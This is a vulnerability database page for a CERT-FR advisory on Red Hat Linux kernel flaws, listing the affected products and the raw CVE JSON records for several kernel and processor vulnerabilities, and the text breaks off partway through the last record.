Vulnerability-Lookup

CERTFR-2024-AVI-0164

Vulnerability from certfr_avis - Published: - Updated:

De multiples vulnérabilités ont été découvertes dans le noyau Linux de RedHat. Certaines d'entre elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur, une exécution de code arbitraire à distance et un déni de service à distance.

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

Vendor	Product	Description
Red Hat	Red Hat Enterprise Linux Server	Red Hat Enterprise Linux Server - AUS 8.6 x86_64
Red Hat	Red Hat Enterprise Linux	Red Hat Enterprise Linux for Power, little endian 8 ppc64le
Red Hat	Red Hat Enterprise Linux	Red Hat Enterprise Linux for IBM z Systems 8 s390x
Red Hat	Red Hat Enterprise Linux Server	Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.6 ppc64le
Red Hat	Red Hat Enterprise Linux	Red Hat Enterprise Linux for x86_64 - Extended Update Support 8.6 x86_64
Red Hat	Red Hat Enterprise Linux	Red Hat Enterprise Linux for Power, little endian - Extended Update Support 8.6 ppc64le
Red Hat	Red Hat Enterprise Linux	Red Hat Enterprise Linux for x86_64 8 x86_64
Red Hat	Red Hat Enterprise Linux Server	Red Hat Enterprise Linux Server - TUS 8.6 x86_64
Red Hat	Red Hat Enterprise Linux	Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 8.6 s390x
Red Hat	Red Hat CodeReady Linux Builder	Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 8.6 aarch64
Red Hat	Red Hat Enterprise Linux	Red Hat Enterprise Linux for ARM 64 8 aarch64
Red Hat	Red Hat CodeReady Linux Builder	Red Hat CodeReady Linux Builder for ARM 64 8 aarch64
Red Hat	Red Hat CodeReady Linux Builder	Red Hat CodeReady Linux Builder for x86_64 8 x86_64
Red Hat	Red Hat CodeReady Linux Builder	Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 8.6 x86_64
Oracle	Virtualization	Red Hat Virtualization Host 4 for RHEL 8 x86_64
Red Hat	Red Hat CodeReady Linux Builder	Red Hat CodeReady Linux Builder for Power, little endian 8 ppc64le
Red Hat	Red Hat Enterprise Linux	Red Hat Enterprise Linux for ARM 64 - Extended Update Support 8.6 aarch64
Red Hat	Red Hat CodeReady Linux Builder	Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 8.6 ppc64le
Red Hat	Red Hat Enterprise Linux	Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.6 x86_64

References

Title

Publication Time

CVE-2021-33655 (GCVE-0-2021-33655)

Vulnerability from cvelistv5 – Published: 2022-07-18 14:45 – Updated: 2024-08-03 23:58

Summary

When sending malicous data to kernel by ioctl cmd FBIOPUT_VSCREENINFO,kernel will write memory out of bounds.

Severity

No CVSS data available.

CWE

CWE-787 - Out-of-bounds Write

Assigner

openEuler

References

4 references

URL	Tags
https://git.kernel.org/pub/scm/linux/kernel/git/t…	x_refsource_MISC
http://www.openwall.com/lists/oss-security/2022/07/19/2	mailing-listx_refsource_MLIST
https://www.debian.org/security/2022/dsa-5191	vendor-advisoryx_refsource_DEBIAN
https://lists.debian.org/debian-lts-announce/2022…	mailing-listx_refsource_MLIST

Impacted products

1 product

Vendor	Product	Version
n/a	kernel	Affected: 5.18 5.19.0-rc1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T23:58:22.899Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=086ff84617185393a0bbf25830c4f36412a7d3f4"
          },
          {
            "name": "[oss-security] 20220719 CVE-2021-33655: Linux kernel: When sending malicous data to kernel by ioctl cmd FBIOPUT_VSCREENINFO,kernel will write memory out of bounds.(5.18 5.19.0-rc1)",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2022/07/19/2"
          },
          {
            "name": "DSA-5191",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2022/dsa-5191"
          },
          {
            "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "5.18 5.19.0-rc1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "When sending malicous data to kernel by ioctl cmd FBIOPUT_VSCREENINFO,kernel will write memory out of bounds."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-787",
              "description": "CWE-787: Out-of-bounds Write",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-10-02T18:06:20.000Z",
        "orgId": "7e1ac599-2767-43fa-b3ea-f10178cc98f2",
        "shortName": "openEuler"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=086ff84617185393a0bbf25830c4f36412a7d3f4"
        },
        {
          "name": "[oss-security] 20220719 CVE-2021-33655: Linux kernel: When sending malicous data to kernel by ioctl cmd FBIOPUT_VSCREENINFO,kernel will write memory out of bounds.(5.18 5.19.0-rc1)",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2022/07/19/2"
        },
        {
          "name": "DSA-5191",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2022/dsa-5191"
        },
        {
          "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "securities@openeuler.org",
          "ID": "CVE-2021-33655",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "5.18 5.19.0-rc1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "When sending malicous data to kernel by ioctl cmd FBIOPUT_VSCREENINFO,kernel will write memory out of bounds."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-787: Out-of-bounds Write"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=086ff84617185393a0bbf25830c4f36412a7d3f4",
              "refsource": "MISC",
              "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=086ff84617185393a0bbf25830c4f36412a7d3f4"
            },
            {
              "name": "[oss-security] 20220719 CVE-2021-33655: Linux kernel: When sending malicous data to kernel by ioctl cmd FBIOPUT_VSCREENINFO,kernel will write memory out of bounds.(5.18 5.19.0-rc1)",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2022/07/19/2"
            },
            {
              "name": "DSA-5191",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2022/dsa-5191"
            },
            {
              "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "7e1ac599-2767-43fa-b3ea-f10178cc98f2",
    "assignerShortName": "openEuler",
    "cveId": "CVE-2021-33655",
    "datePublished": "2022-07-18T14:45:50.000Z",
    "dateReserved": "2021-05-28T00:00:00.000Z",
    "dateUpdated": "2024-08-03T23:58:22.899Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-20368 (GCVE-0-2022-20368)

Vulnerability from cvelistv5 – Published: 2022-08-11 14:59 – Updated: 2024-08-03 02:10

Summary

Product: AndroidVersions: Android kernelAndroid ID: A-224546354References: Upstream kernel

Severity

No CVSS data available.

CWE

Elevation of privilege

Assigner

google_android

References

1 reference

URL	Tags
https://source.android.com/security/bulletin/pixe…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
n/a	Android	Affected: Android kernel

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T02:10:44.623Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://source.android.com/security/bulletin/pixel/2022-08-01"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Android",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Android kernel"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Product: AndroidVersions: Android kernelAndroid ID: A-224546354References: Upstream kernel"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Elevation of privilege",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-08-11T14:59:35.000Z",
        "orgId": "baff130e-b8d5-4e15-b3d3-c3cf5d5545c6",
        "shortName": "google_android"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://source.android.com/security/bulletin/pixel/2022-08-01"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@android.com",
          "ID": "CVE-2022-20368",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Android",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Android kernel"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Product: AndroidVersions: Android kernelAndroid ID: A-224546354References: Upstream kernel"
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Elevation of privilege"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://source.android.com/security/bulletin/pixel/2022-08-01",
              "refsource": "MISC",
              "url": "https://source.android.com/security/bulletin/pixel/2022-08-01"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "baff130e-b8d5-4e15-b3d3-c3cf5d5545c6",
    "assignerShortName": "google_android",
    "cveId": "CVE-2022-20368",
    "datePublished": "2022-08-11T14:59:35.000Z",
    "dateReserved": "2021-10-14T00:00:00.000Z",
    "dateUpdated": "2024-08-03T02:10:44.623Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-2196 (GCVE-0-2022-2196)

Vulnerability from cvelistv5 – Published: 2023-01-09 10:59 – Updated: 2025-02-13 16:28

Title

Speculative execution attacks in KVM VMX

Summary

A regression exists in the Linux Kernel within KVM: nVMX that allowed for speculative execution attacks. L2 can carry out Spectre v2 attacks on L1 due to L1 thinking it doesn't need retpolines or IBPB after running L2 due to KVM (L0) advertising eIBRS support to L1. An attacker at L2 with code execution can execute code on an indirect branch on the host machine. We recommend upgrading to Kernel 6.2 or past commit 2e7eab81425a

Severity

5.8 (Medium)


                        
                          CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L

CWE

CWE-1188 - Insecure Default Initialization of Resource

Assigner

Google

References

3 references

URL	Tags
https://kernel.dance/#2e7eab81425a
https://git.kernel.org/pub/scm/linux/kernel/git/t…
https://lists.debian.org/debian-lts-announce/2023…

Impacted products

1 product

Vendor	Product	Version
Linux	Linux Kernel	Affected: 0 , < 2e7eab81425a (git) Affected: 0 , < 6.2 (custom)

Date Public

2022-10-18 22:00

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T00:32:08.645Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://security.netapp.com/advisory/ntap-20230223-0002/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/#2e7eab81425a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2e7eab81425ad6c875f2ed47c0ce01e78afc38a5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-2196",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-08-01T15:07:47.721131Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-01T15:08:01.626Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "KVM",
          "product": "Linux Kernel",
          "repo": "https://git.kernel.org/",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "2e7eab81425a",
              "status": "affected",
              "version": "0",
              "versionType": "git"
            },
            {
              "lessThan": "6.2",
              "status": "affected",
              "version": "0",
              "versionType": "custom"
            }
          ]
        }
      ],
      "datePublic": "2022-10-18T22:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "A regression exists in the Linux Kernel within KVM: nVMX that allowed for speculative execution attacks.\u0026nbsp;\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eL2 can carry out Spectre v2 attacks on L1 due to L1 thinking it doesn\u0027t need retpolines or IBPB\u0026nbsp;\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eafter running L2 due to KVM (L0) advertising eIBRS support to L1. An attacker at L2 with code execution can execute code on an indirect branch on the host machine. We recommend upgrading to Kernel 6.2 or past commit\u0026nbsp;2e7eab81425a\u003c/span\u003e\u003c/span\u003e\u003cbr\u003e"
            }
          ],
          "value": "A regression exists in the Linux Kernel within KVM: nVMX that allowed for speculative execution attacks.\u00a0L2 can carry out Spectre v2 attacks on L1 due to L1 thinking it doesn\u0027t need retpolines or IBPB\u00a0after running L2 due to KVM (L0) advertising eIBRS support to L1. An attacker at L2 with code execution can execute code on an indirect branch on the host machine. We recommend upgrading to Kernel 6.2 or past commit\u00a02e7eab81425a"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-30",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-30 Hijacking a Privileged Thread of Execution"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "LOW",
            "baseScore": 5.8,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-1188",
              "description": "CWE-1188 Insecure Default Initialization of Resource",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-05-03T00:06:59.149Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "url": "https://kernel.dance/#2e7eab81425a"
        },
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2e7eab81425ad6c875f2ed47c0ce01e78afc38a5"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html"
        }
      ],
      "source": {
        "discovery": "INTERNAL"
      },
      "title": "Speculative execution attacks in KVM VMX",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2022-2196",
    "datePublished": "2023-01-09T10:59:53.099Z",
    "dateReserved": "2022-06-24T13:29:09.969Z",
    "dateUpdated": "2025-02-13T16:28:57.097Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-23960 (GCVE-0-2022-23960)

Vulnerability from cvelistv5 – Published: 2022-03-12 23:57 – Updated: 2024-08-03 03:59

Summary

Certain Arm Cortex and Neoverse processors through 2022-03-08 do not properly restrict cache speculation, aka Spectre-BHB. An attacker can leverage the shared branch history in the Branch History Buffer (BHB) to influence mispredicted branches. Then, cache allocation can allow the attacker to obtain sensitive information.

Severity

No CVSS data available.

CWE

Assigner

mitre

References

5 references

URL	Tags
https://developer.arm.com/support/arm-security-up…	x_refsource_CONFIRM
https://developer.arm.com/support/arm-security-updates	x_refsource_MISC
http://www.openwall.com/lists/oss-security/2022/03/18/2	mailing-listx_refsource_MLIST
https://lists.debian.org/debian-lts-announce/2022…	mailing-listx_refsource_MLIST
https://www.debian.org/security/2022/dsa-5173	vendor-advisoryx_refsource_DEBIAN

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T03:59:23.170Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://developer.arm.com/support/arm-security-updates/speculative-processor-vulnerability"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://developer.arm.com/support/arm-security-updates"
          },
          {
            "name": "[oss-security] 20220318 Xen Security Advisory 398 v2 - Multiple speculative security issues",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2022/03/18/2"
          },
          {
            "name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html"
          },
          {
            "name": "DSA-5173",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2022/dsa-5173"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Certain Arm Cortex and Neoverse processors through 2022-03-08 do not properly restrict cache speculation, aka Spectre-BHB. An attacker can leverage the shared branch history in the Branch History Buffer (BHB) to influence mispredicted branches. Then, cache allocation can allow the attacker to obtain sensitive information."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-07-04T10:10:34.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://developer.arm.com/support/arm-security-updates/speculative-processor-vulnerability"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://developer.arm.com/support/arm-security-updates"
        },
        {
          "name": "[oss-security] 20220318 Xen Security Advisory 398 v2 - Multiple speculative security issues",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2022/03/18/2"
        },
        {
          "name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html"
        },
        {
          "name": "DSA-5173",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2022/dsa-5173"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2022-23960",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Certain Arm Cortex and Neoverse processors through 2022-03-08 do not properly restrict cache speculation, aka Spectre-BHB. An attacker can leverage the shared branch history in the Branch History Buffer (BHB) to influence mispredicted branches. Then, cache allocation can allow the attacker to obtain sensitive information."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://developer.arm.com/support/arm-security-updates/speculative-processor-vulnerability",
              "refsource": "CONFIRM",
              "url": "https://developer.arm.com/support/arm-security-updates/speculative-processor-vulnerability"
            },
            {
              "name": "https://developer.arm.com/support/arm-security-updates",
              "refsource": "MISC",
              "url": "https://developer.arm.com/support/arm-security-updates"
            },
            {
              "name": "[oss-security] 20220318 Xen Security Advisory 398 v2 - Multiple speculative security issues",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2022/03/18/2"
            },
            {
              "name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html"
            },
            {
              "name": "DSA-5173",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2022/dsa-5173"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2022-23960",
    "datePublished": "2022-03-12T23:57:21.000Z",
    "dateReserved": "2022-01-26T00:00:00.000Z",
    "dateUpdated": "2024-08-03T03:59:23.170Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-29581 (GCVE-0-2022-29581)

Vulnerability from cvelistv5 – Published: 2022-05-17 16:50 – Updated: 2025-04-21 13:53

Summary

Improper Update of Reference Count vulnerability in net/sched of Linux Kernel allows local attacker to cause privilege escalation to root. This issue affects: Linux Kernel versions prior to 5.18; version 4.14 and later versions.

Severity

7.8 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-911 - Improper Update of Reference Count

Assigner

Google

References

7 references

URL	Tags
https://git.kernel.org/pub/scm/linux/kernel/git/t…	x_refsource_MISC
https://kernel.dance/#3db09e762dc79584a69c10d74a6…	x_refsource_MISC
http://www.openwall.com/lists/oss-security/2022/05/18/2	mailing-listx_refsource_MLIST
http://packetstormsecurity.com/files/167386/Kerne…	x_refsource_MISC
https://security.netapp.com/advisory/ntap-2022062…	x_refsource_CONFIRM
https://www.debian.org/security/2022/dsa-5173	vendor-advisoryx_refsource_DEBIAN
http://packetstormsecurity.com/files/168191/Kerne…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
Linux	Kernel	Affected: unspecified , < 5.18 (custom) Affected: 4.14 , < unspecified (custom)

Credits

syzbot <syzkaller@googlegroups.com>

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T06:26:06.284Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3db09e762dc79584a69c10d74a6b98f89a9979f8"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://kernel.dance/#3db09e762dc79584a69c10d74a6b98f89a9979f8"
          },
          {
            "name": "[oss-security] 20220518 CVE-2022-29581: Linux kernel cls_u32 UAF",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2022/05/18/2"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/167386/Kernel-Live-Patch-Security-Notice-LSN-0086-1.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220629-0005/"
          },
          {
            "name": "DSA-5173",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2022/dsa-5173"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/168191/Kernel-Live-Patch-Security-Notice-LSN-0089-1.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-29581",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-21T13:39:49.364291Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-21T13:53:27.216Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5.18",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            },
            {
              "lessThan": "unspecified",
              "status": "affected",
              "version": "4.14",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "syzbot \u003csyzkaller@googlegroups.com\u003e"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Improper Update of Reference Count vulnerability in net/sched of Linux Kernel allows local attacker to cause privilege escalation to root. This issue affects: Linux Kernel versions prior to 5.18; version 4.14 and later versions."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-911",
              "description": "CWE-911 Improper Update of Reference Count",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-08-30T16:06:25.000Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3db09e762dc79584a69c10d74a6b98f89a9979f8"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://kernel.dance/#3db09e762dc79584a69c10d74a6b98f89a9979f8"
        },
        {
          "name": "[oss-security] 20220518 CVE-2022-29581: Linux kernel cls_u32 UAF",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2022/05/18/2"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
